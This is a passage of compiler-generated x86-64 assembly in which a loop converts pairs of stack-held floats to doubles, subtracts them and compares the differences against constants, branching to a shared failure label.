movsd LCPI1_5(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.61: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.62: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.63: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.64: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.65: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_66
jp LBB1_66
jmp LBB1_75
LBB1_66: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_67
jp LBB1_67
jmp LBB1_75
LBB1_67: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_68
jp LBB1_68
jmp LBB1_75
LBB1_68: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_69
jp LBB1_69
jmp LBB1_75
LBB1_69: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_70
jp LBB1_70
jmp LBB1_75
LBB1_70: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_5(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_71
jp LBB1_71
jmp LBB1_75
LBB1_71: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_72
jp LBB1_72
jmp LBB1_75
LBB1_72: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_73
jp LBB1_73
jmp LBB1_75
LBB1_73: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_74
jp LBB1_74
jmp LBB1_75
LBB1_74: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -92(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_75: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.76: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.77: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.78: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.79: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.80: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.81: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.82: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.83: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.84: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.85: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_86
jp LBB1_86
jmp LBB1_95
LBB1_86: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_87
jp LBB1_87
jmp LBB1_95
LBB1_87: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_88
jp LBB1_88
jmp LBB1_95
LBB1_88: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_89
jp LBB1_89
jmp LBB1_95
LBB1_89: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_90
jp LBB1_90
jmp LBB1_95
LBB1_90: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_91
jp LBB1_91
jmp LBB1_95
LBB1_91: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_92
jp LBB1_92
jmp LBB1_95
LBB1_92: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_93
jp LBB1_93
jmp LBB1_95
LBB1_93: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_94
jp LBB1_94
jmp LBB1_95
LBB1_94: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -196(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_95: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.96: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.97: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.98: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.99: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.100: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_8(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.101: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.102: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_18(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.103: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.104: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.105: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_17(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_106
jp LBB1_106
jmp LBB1_115
LBB1_106: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_107
jp LBB1_107
jmp LBB1_115
LBB1_107: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_108
jp LBB1_108
jmp LBB1_115
LBB1_108: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_109
jp LBB1_109
jmp LBB1_115
LBB1_109: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_110
jp LBB1_110
jmp LBB1_115
LBB1_110: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_8(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_111
jp LBB1_111
jmp LBB1_115
LBB1_111: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_112
jp LBB1_112
jmp LBB1_115
LBB1_112: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_18(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_113
jp LBB1_113
jmp LBB1_115
LBB1_113: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_114
jp LBB1_114
jmp LBB1_115
LBB1_114: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -76(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_115: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_19(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.116: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.117: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_8(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.118: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
